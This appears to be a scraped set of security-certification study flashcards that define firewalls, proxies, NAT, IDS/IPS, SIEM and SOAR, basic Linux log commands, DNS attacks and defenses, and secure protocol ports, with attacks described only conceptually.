  • Bridged (layer 2)—the firewall inspects traffic passing between two nodes, such as a router and a switch. This is also referred to as transparent mode. The firewall does not have an IP interface (except for configuration management). It bridges the Ethernet interfaces between the two nodes. Despite performing forwarding at layer 2, the firewall can still inspect and filter traffic on the basis of the full range of packet headers. The typical use case for a transparent firewall is to deploy it without having to reconfigure subnets and reassign IP addresses on other devices.
Term
router firewall  
Definition

A router firewall or firewall router appliance implements filtering functionality as part of the router firmware. The difference is that a router appliance is primarily designed for routing, with firewall as a secondary feature. SOHO Internet router/modems come with a firewall built-in, for example. 

 

Term
Host-based firewall (or personal firewall
Definition

Host-based firewall (or personal firewall)—implemented as a software application running on a single host designed to protect that host only. As well as enforcing packet filtering ACLs, a personal firewall can be used to allow or deny software processes from accessing the network.

 

Term
Application firewall 
Definition

Application firewall—software designed to run on a server to protect a particular application only (a web server firewall, for instance, or a firewall designed to protect an SQL Server database). This is a type of host-based firewall and would typically be deployed in addition to a network firewall.

Application-aware firewalls can inspect the contents of packets at the application layer, which includes analyzing the HTTP headers and the HTML code.

 

Term
Network operating system (NOS) firewall 
Definition

Network operating system (NOS) firewall—a software-based firewall running under a network server OS, such as Windows or Linux. The server would function as a gateway or proxy for a network segment. 

 

Term
Forward Proxy Servers
Definition

A forward proxy provides for protocol-specific outbound traffic. For example, you might deploy a web proxy that enables client computers on the LAN to connect to websites and secure websites on the Internet. This is a forward proxy that services TCP ports 80 and 443 for outbound traffic. 

Term
non-transparent proxy 
Definition

§  non-transparent proxy means that the client must be configured with the proxy server address and port number to use it. The port on which the proxy server accepts client connections is often configured as port 8080.

Term
transparent (or forced or intercepting) proxy 
Definition

§  transparent (or forced or intercepting) proxy intercepts client traffic without the client having to be reconfigured. A transparent proxy must be implemented on a switch or router or other inline network appliance.

Term

Reverse Proxy Servers 

Definition

A reverse proxy server provides for protocol-specific inbound traffic. For security purposes, you might not want external hosts to be able to connect directly to application servers, such as web, email, and VoIP servers. Instead, you can deploy a reverse proxy on the network edge and configure it to listen for client requests from a public network (the Internet). The proxy applies filtering rules and if accepted, it creates the appropriate request for an application server within a DMZ. In addition, some reverse proxy servers can handle application-specific load balancing, traffic encryption, and caching, reducing the overhead on the application servers. 

 

Term
Network address translation (NAT) 
NAT gateway
Definition

Network address translation (NAT) was devised as a way of freeing up scarce IP addresses for hosts needing Internet access. A private network will typically use a private addressing scheme to allocate IP addresses to hosts. These addresses can be drawn from one of the pools of addresses defined in RFC 1918 as non-routable over the Internet:

§  10.0.0.0 to 10.255.255.255 (Class A private address range).

§  172.16.0.0 to 172.31.255.255 (Class B private address range).

§  192.168.0.0 to 192.168.255.255 (Class C private address range).

 

A NAT gateway is a service that translates between the private addressing scheme used by hosts on the LAN and the public addressing scheme used by router, firewall, or proxy server on the network edge. NAT provides security in the sense that it can manage ingress and egress traffic at well-defined points on the network edge, but it is important to realize that it does not perform a filtering function.

Term
Static and dynamic source NAT 
Definition
perform 1:1 mappings between private ("inside local") network address and public ("inside global") addresses. These mappings can be static or dynamically assigned.
Term
Overloaded NAT/Network Address Port Translation (NAPT)/Port Address Translation (PAT) 
Definition
provides a means for multiple private IP addresses to be mapped onto a single public address. For example, say two hosts (10.0.0.101 and 10.0.0.103) initiate a web connection at the same time. The NAPT service creates two new port mappings for these requests (10.0.0.101:60101 and 10.0.0.103:60103). It then substitutes the private IPs for the public IP and forwards the requests to the public Internet. It performs a reverse mapping on any traffic returned using those ports, inserting the original IP address and port number, and forwards the packets to the internal hosts.
Term
Destination NAT/port forwarding 
Definition

§  Destination NAT/port forwarding—uses the router's public address to publish a web service, but forwards incoming requests to a different IP. Port forwarding means that the router takes requests from the Internet for a particular application (say, HTTP/port 80) and sends them to a designated host and port in the DMZ or LAN. 

Term
intrusion detection system (IDS)  
Definition
An intrusion detection system (IDS) is a means of using software tools to provide real-time analysis of either network traffic or system and application logs. 
Term
network-based IDS (NIDS)
Definition

network-based IDS (NIDS) captures traffic via a packet sniffer, referred to as a sensor. It analyzes the packets to identify malicious traffic and displays alerts to a console or dashboard.
Snort 

Suricata

Zeek/Bro 

performs passive detection. When traffic is matched to a detection signature, it raises an alert or generates a log entry, but does not block the source host. This type of passive sensor does not slow down traffic and is undetectable by the attacker. It does not have an IP address on the monitored network segment.

 


A NIDS is used to identify and log hosts and applications and to detect attack signatures, password guessing attempts, port scans, worms, backdoor applications, malformed packets or sessions, and policy violations (ports or IP addresses that are not permitted, for instance). You can use analysis of the logs to tune firewall rulesets, remove or block suspect hosts and processes from the network, or deploy additional security controls to mitigate any threats you identify.

Term
SPAN (switched port analyzer)/mirror port 
Definition
this means that the sensor is attached to a specially configured port on the switch that receives copies of frames addressed to nominated access ports (or all the other ports). This method is not completely reliable. Frames with errors will not be mirrored and frames may be dropped under heavy load.
Term
Passive test access point (TAP)
Definition
this is a box with ports for incoming and outgoing network cabling and an inductor or optical splitter that physically copies the signal from the cabling to a monitor port. There are types for copper and fiber optic cabling. Unlike a SPAN, no logic decisions are made so the monitor port receives every frame—corrupt or malformed or not—and the copying is unaffected by load.
Term
Active TAP
Definition
this is a powered device that performs signal regeneration (again, there are copper and fiber variants), which may be necessary in some circumstances. Gigabit signaling over copper wire is too complex for a passive tap to monitor and some types of fiber links may be adversely affected by optical splitting. Because it performs an active function, the TAP becomes a point of failure for the links in the event of power loss. When deploying an active TAP, it is important to use a model with internal batteries or connect it to a UPS.
Term
 test access point (TAP)
Definition

A hardware device inserted into a cable to copy frames for analysis.

 

Term
intrusion prevention system (IPS)  
Definition

Compared to the passive function of an IDS, an intrusion prevention system (IPS) can provide an active response to any network threats that it matches. One typical preventive measure is to end the TCP session, sending a TCP reset packet to the attacking host. Another option is for the IPS to apply a temporary filter on the firewall to block the attacker's IP address (shunning). Other advanced measures include throttling bandwidth to attacking hosts, applying complex firewall filters, and even modifying suspect packets to render them harmless. Finally, the appliance may be able to run a script or third-party program to perform some other action not supported by the IPS software itself. 

Term
Signature-based detection  
Definition

Signature-based detection (or pattern-matching) means that the engine is loaded with a database of attack patterns or signatures. If traffic matches a pattern, then the engine generates an incident.

The signatures and rules (often called plug-ins or feeds) powering intrusion detection need to be updated regularly to provide protection against the latest threat types. Commercial software requires a paid-for subscription to obtain the updates. It is important to ensure that the software is configured to update only from valid repositories, ideally using a secure connection method, such as HTTPS.

  1. Signatures and rules must be kept up to date to protect against emerging threats.The signatures and rules (often called plug-ins or feeds) powering intrusion detection need updating regularly to provide protection against the latest threat types.
Term
Behavioral-based detection 
Definition

A network monitoring system that detects changes in normal operating data sequences and identifies abnormal sequences.


Behavioral-based detection means that the engine is trained to recognize baseline "normal" traffic or events. Anything that deviates from this baseline (outside a defined level of tolerance) generates an incident. The idea is that the software will be able to identify zero day attacks, insider threats, and other malicious activity for which there is no signature.

Term
heuristics 
Definition

A method that uses feature comparisons and likenesses rather than specific signature matching to identify whether the target of observation is malicious.

 

Term
network behavior and anomaly detection (NBAD
heuristics 
false positive 
false negative 
Definition


Historically, this type of detection was provided by
network behavior and anomaly detection (NBAD) products. An NBAD engine uses heuristics to generate a statistical model of what baseline normal traffic looks like. It may develop several profiles to model network use at different times of the day. This means that the system generates false positive and false negatives until it has had time to improve its statistical model of what is "normal."false positive is where legitimate behavior generates an alert, while a false negative is where malicious activity is not alerted.

Term

 next-generation firewall (NGFW)

×

 

Definition

Host or network firewall capable of parsing application layer protocol headers and data (such as HTTP or SMTP) so that sophisticated, content-sensitive ACLs can be developed.

 

Term
Unified threat management (UTM)
Definition

All-in-one security appliances and agents that combine the functions of a firewall, malware scanner, intrusion detection, vulnerability scanner, data loss prevention, content filtering, and so on.


Unified threat management (UTM) refers to a security product that centralizes many types of security controls—firewall, anti-malware, network intrusion prevention, spam filtering, content filtering, data loss prevention, VPN, cloud access gateway—into a single appliance. This means that you can monitor and manage the controls from a single console.

A UTM might not perform as well as software or a device with a single dedicated security function.

Term
content filter  
Definition

A software application or gateway that filters client requests for various types of internet content (web, FTP, IM, and so on). 

 

A content filter restricts web use to only authorized sites. Examples of content filter uses can be schools restricting access to only sites that are .edu or to not allow sites that have adult-level content.

 

Another example of a content filter can be the workplace, only allowing sites that are for work purposes.

Term
 secure web gateway (SWG)
Definition

An appliance or proxy server that mediates client connections with the Internet by filtering spam and malware and enforcing access restrictions on types of sites visited, time spent, and bandwidth consumed.

As well as filtering, a SWG performs threat analysis and often integrates the functionality of data loss prevention (DLP) and cloud access security brokers (CASB) to protect against the full range of unauthorized egress threats, including malware command and control and data exfiltration.

 

Term
host-based IDS (HIDS)
Definition

A type of IDS that monitors a computer system for unexpected behavior or drastic changes to the system's state.host-based IDS (HIDS) captures information from a single host, such as a server, router, or firewallHIDS come in many different forms with different capabilities. The core ability is to capture and analyze log files, but more sophisticated systems can also monitor OS kernel files, monitor ports and network interfaces, and process data and logs generated by specific applications, such as HTTP or FTP.


HIDS software produces similar output to an anti-malware scanner. If the software detects a threat, it may just log the event or display an alert. The log should show you which process initiated the event and what resources on the host were affected. You can use the log to investigate whether the suspect process is authorized or should be removed from the host.

 

Term
file integrity monitoring (FIM)
Definition

A type of software that reviews system files to ensure that they have not been tampered with.


One of the core features of HIDS is file integrity monitoring (FIM))When software is installed from a legitimate source (using signed code in the case of Windows or a secure repository in the case of Linux), the OS package manager checks the signature or fingerprint of each executable file and notifies the user if there is a problem. FIM software audits key system files to make sure they match the authorized versions.

Tripwire 
OSSEC 

Term
web application firewall (WAF)
Definition

A firewall designed specifically to protect software running on web servers and their back-end databases from code injection and DoS attacks.


Imperva 
NAXSI 
ModSecurity 

Term
netflow  
Definition

 

NetFlow solutions are a commonly used standard for monitoring network flow data. Released as a feature on Cisco routers, NetFlow allows you to monitor IP network traffic information as data packets enter or exit an interface.
Term

Packet Capture 

Definition

Data captured from network sensors/sniffers plus netflow sources provides both summary statistics about bandwidth and protocol usage and the opportunity for detailed frame analysis.

 

Term

Network Monitors 

Definition

As distinct from network traffic monitoring, a network monitor collects data about network appliances, such as switches, access points, routers, firewalls, and servers. This is used to monitor load status for CPU/memory, state tables, disk capacity, fan speeds/temperature, network link utilization/error statistics, and so on. Another important function is a heartbeat message to indicate availability. This data might be collected using the Simple Network Management Protocol (SNMP) or a proprietary management system. As well as supporting availability, network monitoring might reveal unusual conditions that could point to some kind of attack.

Term
Logs 
Definition

Logs are one of the most valuable sources of security information. A system log can be used to diagnose availability issues. A security log can record both authorized and unauthorized uses of a resource or privilege. Logs function both as an audit trail of actions and (if monitored regularly) provide a warning of intrusion attempts. Log review is a critical part of security assurance. Only referring to the logs following a major incident is missing the opportunity to identify threats and vulnerabilities early and to respond proactively. 

Term
security information and event management (SIEM).
Definition

A solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications.


The core function of a SIEM tool is to aggregate traffic data and logs. In addition to logs from Windows and Linux-based hosts, this could include switches, routers, firewalls, IDS sensors, vulnerability scanners, malware scanners, data loss prevention (DLP) systems, and databases.

Term
SIEM log collection
Definition

§  Agent-basedwith this approach, you must install an agent service on each host. As events occur on the host, logging data is filtered, aggregated, and normalized at the host, then sent to the SIEM server for analysis and storage.

§  Listener/collectorA network appliance that gathers or receives log and/or state data from other network systems.

 

rather than installing an agent, hosts can be configured to push updates to the SIEM server using a protocol such as syslog or SNMP. A process runs on the management server to parse and normalize each log/monitoring source.

Syslog (tools.ietf.org/html/rfc3164) allows for centralized collection of events from multiple sources. It also provides an open format for event logging messages, and as such has become a de facto standard for logging of events from distributed systems. For example, syslog messages can be generated by Cisco routers and switches, as well as servers and workstations.

 

§  Sensoras well as log data, the SIEM might collect packet captures and traffic flow data from sniffers. 

Term

Log Aggregation 

Definition

Log aggregation refers to normalizing data from different sources so that it is consistent and searchable. SIEM software features connectors or plug-ins to interpret (or parse) data from distinct types of systems and to account for differences between vendor implementations. Usually parsing will be carried out using regular expressions tailored to each log file format to identify attributes and content that can be mapped to standard fields in the SIEM's reporting and analysis tools. Another important function is to normalize date/time zone differences to a single timeline.

Term

User and Entity Behavior Analytics

Definition
A user and entity behavior analytics (UEBA) solution supports identification of malicious behaviors from comparison to a baseline. As the name suggests, the analytics software tracks user account behavior across different devices and cloud services. Entity refers to machine accounts, such as client workstations or virtualized server instances, and to embedded hardware, such as Internet of Things (IoT) devices. The complexity of determining baselines and reducing false positives means that UEBA solutions are heavily dependent on AI and machine learning.
Term

Sentiment Analysis 

Definition

The typical use case for sentiment analysis is to monitor social media for brand "incidents," such as a disgruntled customer announcing on Twitter what poor customer service they have just received. In terms of security, this can be used to gather threat intelligence and try to identify external or insider threats before they can develop as attacks. 

Term

Security Orchestration, Automation, and Response (SOAR)

Definition

Security orchestration, automation, and response (SOAR) is designed as a solution to the problem of the volume of alerts overwhelming analysts' ability to respond. A SOAR may be implemented as a standalone technology or integrated with a SIEM—often referred to as a next-gen SIEM. The basis of SOAR is to scan the organization's store of security and threat intelligence, analyze it using machine/deep learning techniques, and then use that data to automate and provide data enrichment for the workflows that drive incident response and threat hunting.

Term

The cat Command

Definition

The Linux cat command allows you to view the contents of one or more files. For example, if you want to view the whole contents of two rotated log files, you could run:


cat -n access.log access2.log


The 
-n switch adds line numbers. If you wanted to output to a new file rather than the terminal, you can run:

 


cat -n access.log access2.log > access_cat.log

Term
The head and tail Commands 
Definition

The head and tail commands output the first and last 10 lines respectively of a file you provide. You can also adjust this default value to output more or fewer lines using the -n switch. For example, the following command shows the 20 most recent entries in a log file:

 


tail -n 20 /var/log/messages

Term
The logger Command 
Definition

The logger command writes input to the local system log or to a remote syslog server (linux.die.net/man/1/logger). You can use the command in a script to write any text string or use the -f option to write the contents of another file. You can also write the output of commands by enclosing the command in backticks. The following command writes the name of the local machine along with the text "up" to the syslog server at 10.1.0.242:

 

logger -n 10.1.0.242 `hostname` up

Term

regular expression (regex)

A group of characters that describe how to execute a specific search pattern on a given text.

A regular expression is a search pattern to match within a given string. The search pattern is built from the regex syntax. This syntax defines metacharacters that function as search operators, quantifiers, logic statements, and anchors/boundaries

 

Definition
  • [ … ] matches a single instance of a character within the brackets. This can include literals, ranges such as [a-z], and token matches, such as [\s] (white space) or [\d] (one digit).
  • + matches one or more occurrences. A quantifier is placed after the term to match; for example, \s+ matches one or more white space characters.
  • * matches zero or more times.
  • ? matches once or not at all.
  • {} matches a number of times. For example, {2} matches two times, {2,} matches two or more times, and {2,5} matches two to five times.
Term

 grep command 
Linux command for searching and filtering input. This can be used as a file search tool when combined with ls.

 

Definition

The grep command invokes simple string matching or regex syntax to search text files for specific strings. This enables you to search the entire contents of a text file for a specific pattern within each line and display that pattern on the screen or dump it to another file. A simple example of grep usage is as follows:

grep -F 192.168.1.254 access.log

This searches the text file access.log for all lines containing some variation of the literal string pattern 192.168.1.254 and prints only those lines to the terminal. The -F switch instructs grep to treat the pattern as a literal.

The following example searches for any IP address in the 192.168.1.0/24 subnet using regex syntax for the pattern (note that each period must be escaped) within any file in any directory from the current one. The -r option enables recursion, while the period in the target part indicates the current directory:

grep -r 192\.168\.1\.[\d]{1,3} ./*

Term

Virtual firewall

Virtual firewalls are usually deployed within data centers and cloud services. A virtual firewall can be implemented in three different ways:

Definition

§  Hypervisor-based—this means that filtering functionality is built into the hypervisor or cloud provisioning tool. You can use the cloud's web app or application programming interface (API) to write access control lists (ACLs) for traffic arriving or leaving a virtual host or virtual network.

§  Virtual appliance—this refers to deploying a vendor firewall appliance instance using virtualization, in the same way you might deploy a Windows or Linux guest OS.

 

§  Multiple context—this refers to multiple virtual firewall instances running on a hardware firewall appliance. Each context has a separate interface and can perform a distinct filtering role.

While they can be deployed like "regular" firewalls for zone-based routing and filtering, virtual firewalls' most significant role is to support the east-west security and zero-trust microsegmentation design paradigms. They are able to inspect traffic as it passes from host-to-host or between virtual networks, rather than requiring that traffic be routed up to a firewall appliance and back.

Term

 

Artificial intelligence (AI) and machine learning are especially important during which security information and event management (SIEM) task?

Definition
  1. Analysis and report review

    SIEM software can link individual events or data points (observables) into a meaningful indicator of risk, or Indicator of Compromise (IOC). Many SIEM solutions use artificial intelligence (AI) and machine learning as the basis for automated analysis.

     

Term
Dynamic Host Configuration Protocol (DHCP)
Definition
The Dynamic Host Configuration Protocol (DHCP) provides an automatic method for network address allocation. The key point about DHCP is that only one server should be offering addresses to any one group of hosts.
Term

 

DHCP snooping 
Definition
DHCP snooping is a way to prevent unauthorized DHCP servers or people trying to use static IP addressing to access devices on the inside of your network. This is usually a capability that is enabled on a layer 2 device. It's on your switch.
Term
Domain Name System (DNS)  
Definition
The Domain Name System (DNS) resolves Fully Qualified Domain Name (FQDNs) to IP addresses. It uses a distributed database system that contains information on domains and hosts within those domains. The information is distributed among many name servers, each of which holds part of the database. The name servers work over port 53. 
Term
Domain hijacking 
Definition

A type of hijacking attack where the attacker steals a domain name by altering its registration information and then transferring the domain name to another entity. Sometimes referred to as brandjacking.

Domain hijacking is an attack where an adversary acquires a domain for a company's trading name or trademark, or perhaps some spelling variation thereof.

In a domain hijacking attack an adversary gains control over the registration of a domain name, allowing the host records to be configured to IP addresses of the attacker's choosing. This might be accomplished by supplying false credentials to the domain registrar when applying for a new domain name or re-registering an existing one. An attacker might also be able to exploit the legitimate account used to manage the domain (via a weak password or malware installed on a client computer) or even to compromise the domain registrar's security procedures in some way

A company whose domain has been hijacked is likely to find that they are locked out of the registrar's management console, or that the domain has been transferred to another registrar, often operating in a different country. The whois command can be used to lookup domain registration information to try to detect misuse in other cases.

 

Term
Uniform Resource Locator (URL) Redirection 
Definition

URL redirection refers to the use of HTTP redirecting to open a page other than the one the user requested.  If the redirect is not properly validated by the web application, an attacker can craft a phishing link that might appear legitimate to a naïve user.A threat actor could also compromise a web server and add redirects in .htaccess files. A redirect could also be inserted as JavaScript, either through compromising the server or by uploading a script via a poorly validated form.

 

Term

Domain Reputation

Definition
If your domain, website, or email servers have been hijacked, they are likely to be used for spam or distributing malware. This will lead to complaints and the likelihood of the domain being listed on a block list. You should set up monitoring using a site such as talosintelligence.com/reputation_center to detect misuse early.
Term
DNS POISONING 
Definition

A network-based attack where an attacker exploits the traditionally open nature of the DNS system to redirect a domain name to an IP address of the attacker's choosing.


DNS poisoning is an attack that compromises the process by which clients query name servers to locate the IP address for a Fully Qualified Domain Name (FQDN). There are several ways that a DNS poisoning attack can be perpetrated.

Term

Man in the Middle 

Definition

If the threat actor has access to the same local network as the victim, the attacker can use Address Resolution Protocol (ARP) poisoning to impersonate a legitimate DNS server and respond to DNS queries from the victim with spoofed replies. This might be combined with a denial of service attack on the victim's legitimate DNS server. A rogue Dynamic Host Configuration Protocol (DHCP) could be used to configure clients with the address of a rogue DNS resolver.

 

Term

DNS Client Cache Poisoning 

Definition

Its contents are loaded into a cache of known <name>:<IP address> mappings and the client only contacts a DNS server if the name is not cached. Therefore, if an attacker is able to place a false <name>:<IP address> mapping in the HOSTS file and effectively poison the DNS cache, he or she will be able to redirect traffic. The HOSTS file requires administrator access to modify. In UNIX and Linux systems it is stored as /etc/hosts, while in Windows it is placed in %SystemRoot%\System32\Drivers\etc\hosts.

Term

DNS Server Cache Poisoning 

A DNS server cache poisoning attack is a redirection attack that aims to corrupt the records held by the DNS server itself.

 

Definition

DNS server cache poisoning aims to corrupt the records held by the DNS server itself. This can be accomplished by performing DoS against the server that holds the authorized records for the domain, and then spoofing replies to requests from other name servers. Another attack involves getting the victim name server to respond to a recursive query from the attacking host. A recursive query compels the DNS server to query the authoritative server for the answer on behalf of the client. The attacker's DNS, masquerading as the authoritative name server, responds with the answer to the query, but also includes a lot of false domain:IP mappings for other domains that the victim DNS accepts as genuine. The nslookup or dig tool can be used to query the name records and cached records held by a server to discover whether any false records have been inserted.

Term
DNS Security Extensions (DNSSEC)
dig
nslookup 
Definition

A security protocol that provides authentication of DNS data and upholds DNS data integrity.


With DNSSEC enabled, the authoritative server for the zone creates a "package" of resource records (called an RRset) signed with a private key (the Zone Signing Key). When another server requests a secure record exchange, the authoritative server returns the package along with its public key, which can be used to verify the signature.

The public zone signing key is itself signed with a separate Key Signing Key. Separate keys are used so that if there is some sort of compromise of the zone signing key, the domain can continue to operate securely by revoking the compromised key and issuing a new one.

The Key Signing Key for a particular domain is validated by the parent domain or host ISP. The top-level domain trusts are validated by the Regional Internet Registries and the DNS root servers are self-validated, using a type of M-of-N control group key signing. This establishes a chain of trust from the root servers down to any particular subdomain.

Term

Lightweight Directory Access Protocol (LDAP)
port 389

 LDAP Secure (LDAPS)—the server is installed with a digital certificate, which it uses to set up a secure tunnel for the user credential exchange. LDAPS uses port 636.

Definition

The basic protocol provides no security and all transmissions are in plaintext, making it vulnerable to sniffing and man-in-the-middle attacks. Authentication (referred to as binding to the server) can be implemented in the following ways:


§ 
No authentication—anonymous access is granted to the directory.

§  Simple bind—the client must supply its distinguished name (DN) and password, but these are passed as plaintext.

§  Simple Authentication and Security Layer (SASL)—the client and server negotiate the use of a supported authentication mechanism, such as Kerberos. The STARTTLS command can be used to require encryption (sealing) and message integrity (signing). This is the preferred mechanism for Microsoft's Active Directory (AD) implementation of LDAP.

 

§  LDAP Secure (LDAPS)—the server is installed with a digital certificate, which it uses to set up a secure tunnel for the user credential exchange. LDAPS uses port 636.

Term
The Network Time Protocol (NTP) provides a transport over which to synchronize these time-dependent applications. NTP works over UDP on port 123.
Definition

Many applications on networks are time-dependent and time-critical. These include authentication and security mechanisms, scheduling applications, and backup software. The Network Time Protocol (NTP) provides a transport over which to synchronize these time dependent applications. NTP works over UDP on port 123.

Top-level NTP servers (stratum 1) obtain the Coordinated Universal Time (UTC) from a highly accurate clock source, such as an atomic clock. Lower tier servers then obtain the UTC from multiple stratum 1 servers and sample the results to obtain an authoritative time. Most organizations will use a stratum 2 server to obtain the time for use on the LAN. Servers at lower tiers may then perform the same sort of sampling operation, adjust for the delay involved in propagating the signal, and provide the time to clients. Clients themselves usually obtain the time using a modified form of the protocol (Simple NTP).

NTP has historically lacked any sort of security mechanism, but there are moves to create a security extension for the protocol called Network Time Security 

Term
Simple Network Management Protocol (SNMP) 

Device queries take place over port 161 (UDP);
traps are communicated over port 162 (also UDP).
Definition

The Simple Network Management Protocol (SNMP) is a widely used framework for management and monitoring. SNMP consists of an SNMP monitor and agents.

§  The agent is a process (software or firmware) running on a switch, router, server, or other SNMP-compatible network device.

§  This agent maintains a database called a management information base (MIB) that holds statistics relating to the activity of the device (for example, the number of frames per second handled by a switch). The agent is also capable of initiating a trap operation where it informs the management system of a notable event (port failure, for instance). The threshold for triggering traps can be set for each value. Device queries take place over port 161 (UDP); traps are communicated over port 162 (also UDP).

§  The SNMP monitor (a software program) provides a location from which network activity can be overseen. It monitors all agents by polling them at regular intervals for information from their MIBs and displays the information for review. It also displays any trap operations as alerts for the network administrator to assess and act upon as necessary.

If SNMP is not used, you should remember to change the default configuration password and disable it on any SNMP-capable devices that you add to the network. If you are running SNMP v1 or v2c, keep to the following guidelines:

§  SNMP community names are sent in plaintext and so should not be transmitted over the network if there is any risk that they could be intercepted. SNMP community strings are an authentication mechanism which gives access to a network device's statistics.

§  Use difficult-to-guess community names; never leave the community name blank or set to the default.

§  Use Access Control Lists to restrict management operations to known hosts (that is, restrict to one or two host IP addresses).

 

§  SNMP v3 supports encryption and strong user-based authentication. Instead of community names, the agent is configured with a list of usernames and access permissions. When authentication is required, the SNMP message is signed with a hash of the user's passphrase. The agent can verify the signature and authenticate the user using its own record of the passphrase.

Term

HyperText Transfer Protocol (HTTP)
port 80 TCP


The protocol used to provide web content to browsers. HTTP uses port 80. HTTPS(secure) provides for encrypted transfers, using SSL/TLS and port 443.

 

Definition

The foundation of web technology is the HyperText Transfer Protocol (HTTP). HTTP enables clients (typically web browsers) to request resources from an HTTP server. A client connects to the HTTP server using an appropriate TCP port (the default is port 80) and submits a request for a resource, using a uniform resource locator (URL). The server acknowledges the request and responds with the data (or an error message).


The response and request payload formats are defined in an HTTP header. The HTTP payload is usually used to serve HTML web pages, which are plaintext files with coded tags (HyperText Markup Language) describing how the page should be formatted. A web browser can interpret the tags and display the text and other resources associated with the page, such as binary picture or sound files linked to the HTML page.

 

HTTP also features a forms mechanism (POST) whereby a user can submit data from the client to the server. HTTP is nominally a stateless protocol; this means that the server preserves no information about the client during a session. However, the basic functionality of HTTP servers is often extended by support for scripting and programmable features (web applications). Servers can also set text file cookies to preserve session information. These coding features, plus integration with databases, increase flexibility and interactivity, but also increase the attack surface which exposes more vulnerabilities.

Term

 Transport Layer Security (TLS)
A security protocol that uses certificates for authentication and encryption to protect web communication.

 

Definition

Transport Layer Security is applied at the application level, either by using a separate secure port or by using commands in the application protocol to negotiate a secure connection. 

 

Term

 

 

 

API CONSIDERATIONS

Definition

A library of programming utilities used, for example, to enable software developers to access functions of the TCP/IP network stack under a particular operating system.

 

Term
 XML injection 
Definition

Attack method where malicious XML is passed as input to exploit a vulnerability in the target app.

 

Term
SUBSCRIPTION SERVICES
Definition

 

Employees may require access to all kinds of subscription services. Some examples include:

  • Market and financial intelligence and information.
  • Security threat intelligence and information.
  • Reference and training materials in various formats (ebook and video, for instance).
  • Software applications and cloud services are paid for by subscription rather than permanent licenses.

Most of this sort of content will be delivered by a secure website or cloud application. It may be necessary to provision authentication mechanisms for enterprise single sign-on (SSO) access to the services.

Another use of subscriptions is a web feed, where updated articles or news items are pushed to the client or browser. Web feeds are based on either the Really Simple Syndication (RSS) or Atom formats, both of which use XML to mark up each document supplied by the feed. It is possible that such feeds may be vulnerable to XML injection style attacks, allowing an attacker to show malicious links or even interact with the file system.

Subscription services may also describe the outsourcing of network and security components and procedures. There may also be subscription use of enterprise cloud applications, which may be mediated by an access broker.

Term
SSH FTP (SFTP) 
Secure Shell (SSH) over TCP port 22
Definition

SSH FTP (SFTP) addresses the privacy and integrity issues of FTP by encrypting the authentication and data transfer between client and server. In SFTP, a secure link is created between the client and server using Secure Shell (SSH) over TCP port 22. Ordinary FTP commands and data transfer can then be sent over the secure link without risk of eavesdropping or man-in-the-middle attacks. This solution requires an SSH server that supports SFTP and SFTP client software.

Term
Explicit TLS (FTPES)
Definition
use the AUTH TLS command to upgrade an unsecure connection established over port 21 to a secure one. This protects authentication credentials. The data connection for the actual file transfers can also be encrypted (using the PROT command).
Term
Implicit TLS (FTPS)
secure port 990 for the control connection.
Definition
negotiate an SSL/TLS tunnel before the exchange of any FTP commands. This mode uses the secure port 990 for the control connection.

FTPS is tricky to configure when there are firewalls between the client and server. Consequently, FTPES is usually the preferred method.
Term
Simple Mail Transfer Protocol (SMTP) 
Port 25 = Unsecured
Port 587 = Secure (STARTTLS & require authentication before message submission)
Port 465 = Implicit TLS (Secure but deprecated)

Definition

A sender’s SMTP server discovers the IP address of the recipient’s SMTP server using the domain name of the recipient’s email address. The SMTP server for the domain is registered in DNS using a Mail Exchanger (MX) record.

SMTP communications can be secured using TLS. This works much like HTTPS with a certificate on the SMTP server. There are two ways for SMTP to use TLS:

§  STARTTLS—this is a command that upgrades an existing unsecure connection to use TLS. This is also referred to as explicit TLS or opportunistic TLS.

§  SMTPS—this establishes the secure connection before any SMTP commands (HELO, for instance) are exchanged. This is also referred to as implicit TLS.

The STARTTLS method is generally more widely implemented than SMTPS. Typical SMTP configurations use the following ports and secure services:

§  Port 25—used for message relay (between SMTP servers or Message Transfer Agents [MTA]). If security is required and supported by both servers, the STARTTLS command can be used to set up the secure connection.

§  Port 587—used by mail clients (Message Submission Agents [MSA]) to submit messages for delivery by an SMTP server. Servers configured to support port 587 should use STARTTLS and require authentication before message submission.

§  Port 465—some providers and mail clients use this port for message submission over implicit TLS (SMTPS), though this usage is now deprecated by standards documentation. 

 

Term

Secure POP (POP3S) 

TCP PORT 995  (SECURE)
TCP PORT 110 (unsecure)

POP3 is a mailbox protocol designed to store the messages delivered by SMTP on a server. When the client connects to the mailbox, POP3 downloads the messages to the recipient's email client.

 

Definition

When a recipient’s email client connects to a server mailbox, POP3 downloads the email messages.

A POP3 client application, such as Microsoft Outlook or Mozilla Thunderbird, establishes a TCP connection to the POP3 server over port 110. The user is authenticated (by username and password) and the contents of his or her mailbox are downloaded for processing on the local PC. POP3S is the secured version of the protocol, operating over TCP port 995 by default.

Term

Internet Message Access Protocol v4 (IMAP4) 
TCP PORT 143 (unsecure)
IMAPS PORT 993 (SECURE)

IMAP4 is an application protocol that allows a client to access and manage email messages stored in a mailbox on a remote server.

 

Definition

Compared to POP3, the Internet Message Access Protocol v4 (IMAP4) supports permanent connections to a server and connecting multiple clients to the same mailbox simultaneously. It also allows a client to manage mail folders on the server. Clients connect to IMAP over TCP port 143. They authenticate themselves then retrieve messages from the designated folders. As with other email protocols, the connection can be secured by establishing an SSL/TLS tunnel. The default port for IMAPS is TCP port 993.

Term
Internet Message Access Protocol v4 (IMAP4) 
TCP PORT 143 (unsecured)
IMAPS PORT TCP 993 (SECURE)
Definition

Compared to POP3, the Internet Message Access Protocol v4 (IMAP4) supports permanent connections to a server and connecting multiple clients to the same mailbox simultaneously. It also allows a client to manage mail folders on the server. Clients connect to IMAP over TCP port 143. They authenticate themselves then retrieve messages from the designated folders. As with other email protocols, the connection can be secured by establishing an SSL/TLS tunnel. The default port for IMAPS is TCP port 993.

Term
 Secure/Multipurpose Internet Mail Extensions (S/MIME)
Definition

An email encryption standard that adds digital signatures and public key cryptography to traditional MIME communications.

 

One means of applying authentication and confidentiality on a per-message basis is an email encryption standard called Secure/Multipurpose Internet Mail Extensions (S/MIME). S/MIME adds digital signatures and public key cryptography to mail communications. To use S/MIME, a sender and receiver exchange digital certificates signed by a certification authority (CA).

 

Term
Voice over IP (VoIP)
Definition

A generic name for protocols that carry voice traffic over data networks.

 

Voice over IP (VoIP), web conferencing, and video teleconferencing (VTC) solutions have become standard methods for the provision of business communications. The main challenges that these applications have in common is that they transfer real-time data and must create point-to-point links between hosts on different networks. 

